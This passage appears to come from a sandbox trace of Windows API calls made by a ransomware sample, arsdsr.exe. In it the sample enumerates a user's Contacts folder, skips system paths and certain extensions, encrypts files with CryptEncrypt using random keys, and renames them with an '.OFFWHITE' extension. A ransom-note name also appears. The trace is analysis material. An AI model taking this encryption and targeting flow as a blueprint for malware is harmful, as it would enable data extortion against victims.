(lpString1="desktop.ini", lpString2="...") returned 1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0131.831] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0131.832] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.832] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" [0131.832] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.832] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.832] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0131.832] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0131.832] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0131.832] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0131.832] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0131.832] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0131.832] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0131.832] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0131.832] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2=".") returned 1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="..") returned 1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="...") returned 1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="windows") returned -1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="$recycle.bin") returned 1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="rsa") returned -1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntuser.dat") returned -1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="programdata") returned -1 [0131.832] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="appdata") returned 1 [0131.833] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="program files") returned -1 [0131.833] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="program files (x86)") returned -1 [0131.833] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.833] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="lulcit amkdfe.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0131.833] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.833] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.833] PathFindExtensionW (pszPath="lulcit amkdfe.contact") returned=".contact" [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".exe") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".log") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".cab") returned 1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".cmd") returned 1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".com") returned 1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".cpl") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".ini") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".dll") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".url") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".ttf") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".mp3") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".pif") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".mp4") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".OFFWHITE") returned -1 [0131.833] lstrcmpiW (lpString1=".contact", lpString2=".msi") returned -1 [0131.833] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.833] GetProcessHeap () returned 0x500000 [0131.833] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e38 [0131.834] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.835] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1174) returned 1 [0131.835] GetProcessHeap () returned 0x500000 [0131.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.835] GetProcessHeap () returned 0x500000 [0131.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.835] GetProcessHeap () returned 0x500000 [0131.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.835] GetProcessHeap () returned 0x500000 [0131.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.835] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.835] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.835] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.836] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.836] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.836] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.836] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.836] SetLastError (dwErrCode=0x0) [0131.836] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.838] GetLastError () returned 0x0 [0131.838] GetLastError () returned 0x0 [0131.838] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x596, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.838] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.838] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x696, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.838] WriteFile (in: hFile=0xb0, lpBuffer=0x547e38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e38*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.838] GetProcessHeap () returned 0x500000 [0131.838] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x496) returned 0x53f480 [0131.838] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.838] ReadFile (in: hFile=0xb0, lpBuffer=0x53f480, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesRead=0x295e540*=0x496, lpOverlapped=0x0) returned 1 [0131.839] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.839] WriteFile (in: hFile=0xb0, lpBuffer=0x53f480*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesWritten=0x295e54c*=0x496, lpOverlapped=0x0) returned 1 [0131.839] GetProcessHeap () returned 0x500000 [0131.839] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f480 | out: hHeap=0x500000) returned 1 [0131.839] CloseHandle (hObject=0xb0) returned 1 [0131.854] GetProcessHeap () returned 0x500000 [0131.854] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.854] GetProcessHeap () returned 0x500000 [0131.854] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.854] GetProcessHeap () returned 0x500000 [0131.854] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.854] GetProcessHeap () returned 0x500000 [0131.854] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.854] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0131.854] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.OFFWHITE" [0131.855] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.offwhite")) returned 1 [0131.855] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2=".") returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="..") returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="...") returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="windows") returned -1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="$recycle.bin") returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="rsa") returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="ntuser.dat") returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="programdata") returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="appdata") returned 1 [0131.855] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="program files") returned 1 [0131.856] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="program files (x86)") returned 1 [0131.856] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.856] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="sikvnb huvuib.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" [0131.856] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.856] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.856] PathFindExtensionW (pszPath="sikvnb huvuib.contact") returned=".contact" [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".exe") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".log") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".cab") returned 1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".cmd") returned 1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".com") returned 1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".cpl") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".ini") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".dll") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".url") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".ttf") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".mp3") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".pif") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".mp4") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".OFFWHITE") returned -1 [0131.856] lstrcmpiW (lpString1=".contact", lpString2=".msi") returned -1 [0131.856] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0131.856] GetProcessHeap () returned 0x500000 [0131.856] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e48 [0131.856] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.858] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1172) returned 1 [0131.858] GetProcessHeap () returned 0x500000 [0131.858] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.858] GetProcessHeap () returned 0x500000 [0131.858] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.859] GetProcessHeap () returned 0x500000 [0131.859] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.859] GetProcessHeap () returned 0x500000 [0131.859] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.859] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.859] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.859] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.859] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.859] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.859] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.859] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.859] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.859] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.859] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.859] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.860] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.860] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.860] SetLastError (dwErrCode=0x0) [0131.860] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.862] GetLastError () returned 0x0 [0131.862] GetLastError () returned 0x0 [0131.862] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x594, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.862] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.863] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x694, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.863] WriteFile (in: hFile=0xb0, lpBuffer=0x547e48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e48*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.863] GetProcessHeap () returned 0x500000 [0131.863] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x494) returned 0x53f480 [0131.863] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.863] ReadFile (in: hFile=0xb0, lpBuffer=0x53f480, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesRead=0x295e540*=0x494, lpOverlapped=0x0) returned 1 [0131.863] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.863] WriteFile (in: hFile=0xb0, lpBuffer=0x53f480*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesWritten=0x295e54c*=0x494, lpOverlapped=0x0) returned 1 [0131.863] GetProcessHeap () returned 0x500000 [0131.863] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f480 | out: hHeap=0x500000) returned 1 [0131.863] CloseHandle (hObject=0xb0) returned 1 [0131.869] GetProcessHeap () returned 0x500000 [0131.869] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.869] GetProcessHeap () returned 0x500000 [0131.869] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.869] GetProcessHeap () returned 0x500000 [0131.869] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.869] GetProcessHeap () returned 0x500000 [0131.869] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.869] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" [0131.869] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.OFFWHITE" [0131.869] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.offwhite")) returned 1 [0131.871] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0131.871] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0131.871] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0131.871] lstrcmpiW (lpString1="Cookies", lpString2=".") returned 1 [0131.871] lstrcmpiW (lpString1="Cookies", lpString2="..") returned 1 [0131.871] lstrcmpiW (lpString1="Cookies", lpString2="...") returned 1 [0131.871] lstrcmpiW (lpString1="Cookies", lpString2="windows") returned -1 [0131.871] lstrcmpiW (lpString1="Cookies", lpString2="$recycle.bin") returned 1 [0131.871] lstrcmpiW (lpString1="Cookies", lpString2="rsa") returned -1 [0131.871] lstrcmpiW (lpString1="Cookies", lpString2="ntuser.dat") returned -1 [0131.872] lstrcmpiW (lpString1="Cookies", lpString2="programdata") returned -1 [0131.872] lstrcmpiW (lpString1="Cookies", lpString2="appdata") returned 1 [0131.872] lstrcmpiW (lpString1="Cookies", lpString2="program files") returned -1 [0131.872] lstrcmpiW (lpString1="Cookies", lpString2="program files (x86)") returned -1 [0131.872] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0131.872] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Cookies" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0131.872] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0131.872] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0131.872] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0131.872] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0131.872] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, 